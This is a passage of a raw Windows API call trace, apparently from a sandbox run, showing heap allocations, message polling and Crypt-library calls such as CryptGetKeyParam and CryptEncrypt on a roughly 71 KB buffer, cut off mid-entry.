[0126.241] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43caa48 [0126.241] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f48 [0126.241] PeekMessageW (in: lpMsg=0x144e244, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e244) returned 0 [0126.241] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2840 [0126.241] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2800 [0126.241] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0126.241] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2770 [0126.241] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0126.241] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0126.241] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2910 [0126.241] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0126.241] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0126.241] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2800 [0126.241] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7f0 [0126.241] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0126.241] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28a0 [0126.241] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0126.241] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2800 [0126.241] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0126.241] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0126.241] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2900 [0126.241] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0126.242] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2780 [0126.242] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9b8 [0126.242] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8c78 [0126.242] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0126.242] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27b0 [0126.242] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796ea8 [0126.242] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2848 [0126.242] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0126.242] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2860 [0126.242] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0126.242] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2910 [0126.242] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0126.242] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0126.242] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2900 [0126.242] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0030 [0126.242] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa30 [0126.242] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27b0 [0126.242] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796e28 [0126.242] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e28a8 [0126.242] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0126.242] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2870 [0126.242] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa30 [0126.242] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27c0 [0126.243] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0126.243] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa78 [0126.243] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2810 [0126.243] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2920 [0126.243] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0126.243] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0126.243] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0126.243] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28a0 [0126.243] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2770 [0126.243] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac40 [0126.243] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0030 [0126.243] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2840 [0126.243] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cace8 [0126.243] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2760 [0126.243] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27b0 [0126.243] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac70 [0126.243] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27b0 [0126.243] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabb0 [0126.243] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2800 [0126.243] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2870 [0126.243] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac10 [0126.243] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2780 [0126.243] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab50 [0126.244] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2910 [0126.244] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27c0 [0126.244] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabe0 [0126.244] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27c0 [0126.244] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac88 [0126.244] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2750 [0126.244] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2800 [0126.244] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab68 [0126.244] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2870 [0126.244] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad30 [0126.244] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2760 [0126.244] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27d0 [0126.244] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac28 [0126.244] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab80 [0126.244] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2800 [0126.244] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0126.244] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x11) returned 0x1796fe8 [0126.244] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x1796fe8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0126.244] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff90 [0126.244] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfec8 [0126.244] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2800 [0126.245] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2810 [0126.245] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2820 [0126.245] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2880 [0126.245] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2770 [0126.245] CryptGetKeyParam (in: hKey=0x41ac100, dwParam=0x7, pbData=0x43e27e0, pdwDataLen=0x144e260, dwFlags=0x0 | out: pbData=0x43e27e0*=0x6610, pdwDataLen=0x144e260*=0x4) returned 1 [0126.245] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27d0 [0126.245] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43ea040 [0126.245] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797048 [0126.245] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad00 [0126.245] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caac0 [0126.245] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabf8 [0126.245] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2730 [0126.245] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad60 [0126.245] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad78 [0126.245] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad48 [0126.245] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2880 [0126.245] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab50 [0126.245] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cace8 [0126.245] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab68 [0126.245] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2800 [0126.245] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabc8 [0126.245] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabe0 [0126.245] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad78 [0126.245] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2750 [0126.246] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796de8 [0126.246] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2b48 [0126.246] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab80 [0126.246] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2800 [0126.246] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabb0 [0126.246] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caad8 [0126.246] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac88 [0126.246] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2750 [0126.246] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac58 [0126.246] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caca0 [0126.246] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabe0 [0126.246] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2810 [0126.246] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0080 [0126.246] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0126.246] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27b0 [0126.246] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9b8 [0126.246] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0126.246] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2840 [0126.246] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43ea268 [0126.246] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2810 [0126.246] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00a8 [0126.246] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0126.246] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28b0 [0126.246] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe50 [0126.246] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7f0 [0126.246] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0126.246] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2900 [0126.246] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e8ab0 [0126.247] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28d0 [0126.247] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2780 [0126.247] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2910 [0126.247] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2870 [0126.247] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2810 [0126.247] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2870 [0126.247] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2840 [0126.247] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797108 [0126.247] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27c0 [0126.247] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac540 [0126.247] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0126.247] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2730 [0126.247] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00d0 [0126.247] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0126.247] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28c0 [0126.247] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796fe8 [0126.247] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2668 [0126.247] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0126.247] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2880 [0126.247] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0126.247] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2840 [0126.247] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2670 [0126.247] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e99c8 [0126.247] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0126.247] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2670 [0126.247] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0126.247] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797108 [0126.248] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc70 [0126.248] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0126.248] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0126.248] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc98 [0126.248] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa78 [0126.248] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0126.248] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0126.248] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd38 [0126.248] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0126.248] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0126.248] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0126.248] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0126.248] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0126.248] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf860 [0126.248] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0126.248] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0126.248] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0126.248] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0126.248] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2530 [0126.248] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe28 [0126.248] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9b8 [0126.248] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0126.248] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0126.248] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7c0 [0126.248] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28a0 [0126.248] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd88 [0126.248] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0126.248] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28e0 [0126.249] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0120 [0126.249] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0126.249] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa30 [0126.249] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28f0 [0126.249] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfdd8 [0126.249] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7f0 [0126.249] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2830 [0126.249] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0126.249] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0126.249] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28b0 [0126.249] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2760 [0126.249] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfdb0 [0126.249] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0126.249] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca7c0 [0126.249] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90b0 [0126.249] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0126.249] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2790 [0126.249] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28c0 [0126.249] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x43920a0 [0126.249] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0126.249] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca838 [0126.249] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9218 [0126.249] PeekMessageW (in: lpMsg=0x144e734, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e734) returned 0 [0126.249] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27d0 [0126.249] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2860 [0126.249] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27c0 [0126.249] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796ec8 [0126.250] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac700 [0126.250] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0126.250] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2760 [0126.250] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392500 [0126.250] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0126.250] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca898 [0126.250] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f48 [0126.250] PeekMessageW (in: lpMsg=0x144e8fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e8fc) returned 0 [0126.250] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2740 [0126.250] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2890 [0126.250] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28a0 [0126.250] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2840 [0126.250] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27d0 [0126.250] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43ea040 [0126.250] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2870 [0126.250] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac6c0 [0126.250] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0126.250] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2840 [0126.250] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0126.251] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0126.251] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0126.251] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43cad30, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0126.251] CryptEncrypt (in: hKey=0x41ac100, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x144e790*=0x11885, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x144e790*=0x11890) returned 1 [0126.251] CharLowerBuffW (in: lpsz="byte[71825]", cchLength=0xb | out: lpsz="byte[71825]") returned 0xb [0126.251] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0126.251] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0126.251] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0126.251] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", 